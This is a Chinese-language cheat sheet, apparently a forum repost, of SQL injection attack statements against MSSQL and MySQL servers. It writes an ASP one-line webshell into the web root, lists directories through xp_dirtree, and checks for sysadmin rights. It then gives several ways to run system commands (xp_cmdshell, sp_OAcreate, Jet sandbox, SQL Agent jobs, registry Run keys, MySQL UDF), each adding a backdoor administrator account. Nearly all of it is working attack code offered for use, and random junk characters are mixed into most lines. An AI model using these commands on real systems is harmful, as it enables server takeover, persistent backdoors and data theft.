MSSQL语句导出一句话木马
- l! `( q* l4 s# i7 x" L$ l( U. i首先确定网站的WEB路径2 `1 H) X6 j; ^7 e2 a( A
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
# d) {2 O* M3 f) T6 A7 n; I2 k! a
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 4 z9 U& l; E! R0 ^
//将一句话木马插入表中
" c: j7 ?, r6 d% n8 N$ {2 Q9 t
: [, S8 Y9 d# c. Z;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
, D R2 Y# [' C" `; t, M2 j0 j//导出一个ASP文件
0 e5 e* Q: h4 B& {2 q
& b1 s/ K- ^+ G$ y+ M9 ~) a8 y9 ?+ V7 ^
关于MSSQL列目录
: |6 C( ^( U9 D$ z8 R- l, W;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
5 w( S e) K" Y* h1 H: ^* BInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
e. f; J4 W7 a; A* F+ g
4 Y0 i; ^* d1 K, G) }' Z* M% Wand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录% @" a4 f$ ] N- n4 r) W
' h# v6 P8 v/ {6 Z8 v, G4 p
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段6 q' [, o4 Z1 I0 z: [9 q
: y2 Z- ?7 E+ A
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
, s8 [9 o6 h/ }) z% H) h+ U f2 _2 R' X8 P7 y/ F4 j
# v% U+ S9 e/ r: U9 F数据库版本和权限查看
/ p4 _7 D) z5 `( Q$ D, Zand 1=(select @@VERSION) //查看详细的数据库信息.& a9 N* o* Q! b) V1 C' |! _3 G" B1 W
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
d5 f* u; G8 T% ]and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
# ?( o' k; E9 r8 y, c" n, x, U, ]$ N' C0 Y# U" l4 ~
6 c0 R, Z9 s! b5 E; z+ j1.利用xp_cmdshell执行命令
: H# T t/ ]$ w% X' kexec master..xp_cmdshell 'net user rfire 123456 /add'* ^% i( ~; o% L: w( X D
exec master..xp_cmdshell 'net localgroup administrators rfire /add'
! a Z) y* r2 T4 e+ ]# n" q) S. i8 ^( ~& u# c! e4 {' B
恢复xp_cmdshell存储过程
& K! x1 c( w6 ?) Q+ O1 qExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'& l( ]0 W5 B$ E, G! n8 |2 y
9 M) ^; y# n2 x0 c& m
$ p3 u9 n0 Y1 v x5 i2.利用SP_OAcreate和SP_OAMETHOD执行命令
- l+ o1 j) d) z: A4 a在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下: k" L9 b$ A9 Y* G% s2 y- |; M8 ?
DECLARE @shell INT //建立一个@shell实体
% B+ b C% F+ ?EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
: q4 s" D- I9 T) p2 J4 ]! xEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例8 Z" z A0 u @* y" G4 t: a
! R# Z' f9 a" a( O) w' `9 D# G
1 q; P. M4 W S% ?
3.利用沙盒模式# z/ W7 [( D5 G* [$ @# j% @
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。+ _# {- ~5 ~) S
开启沙盒模式:
) L9 i( r( Z8 V4 V% qEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
# ]0 H0 |/ H' n# k1 k1 R5 A' f* T( W6 }1 G" |
执行命令:
! y5 n; G: I; Q* L0 c- w7 [# USelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")'); ^% j! g# |/ _ ]
6 H8 L8 G$ B# _9 S" v" o/ }/ S
$ [1 y" _+ _8 l
4.利用SQL代理执行命令
9 S. |; R( M. ~6 K3 d$ nEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
! c- a* }# |/ u4 ?% {% l1 F& u: S
1 R4 p' b9 u" t执行命令:( K D* A" b+ u
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错( N0 R" {: T% E" K' B1 p
exec sp_add_job 'x'- d1 i* n& j2 x$ b7 C1 {
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业# ]% Z& q5 _7 D/ O: P) t& n G' Q, y
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业) ^ p8 J* W+ I; L9 \& Z: a
' ?7 J' n( U. H! X9 v
% |: j; ?) \, V+ H; o
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
8 p5 r/ N* U6 h1 m3 uEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
. a! t8 `7 ?% N; o: ]& O
: a* v% I& \% t8 A$ E* a$ f1 L! U8 [" H8 H p7 E% [" i, M6 a
6.MYSQL的命令执行
7 i; U) T1 g6 [3 XMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)
' e; v& b& [7 N1 \0 ]首先要在su.php下导出c:\windows\udf.dll
+ O3 k% b5 s, X% m4 Z* ]/ H% T导出后执行创建自定义函数命令:
* K$ I2 }6 g! L' _ ?. W* V# C% \Create Function cmdshell returns string soname 'udf.dll'2 `! I; v' b+ l$ u8 Z2 i/ y, K# j
执行命令! |: K1 A$ w P. n
select cmdshell('net user rfire 123456 /add')
- ^) o/ i6 [) J# l* O. H) O执行后删除函数 drop function cmdshell+ r. @/ w1 ^# Y3 i( g4 u9 g# u, i
|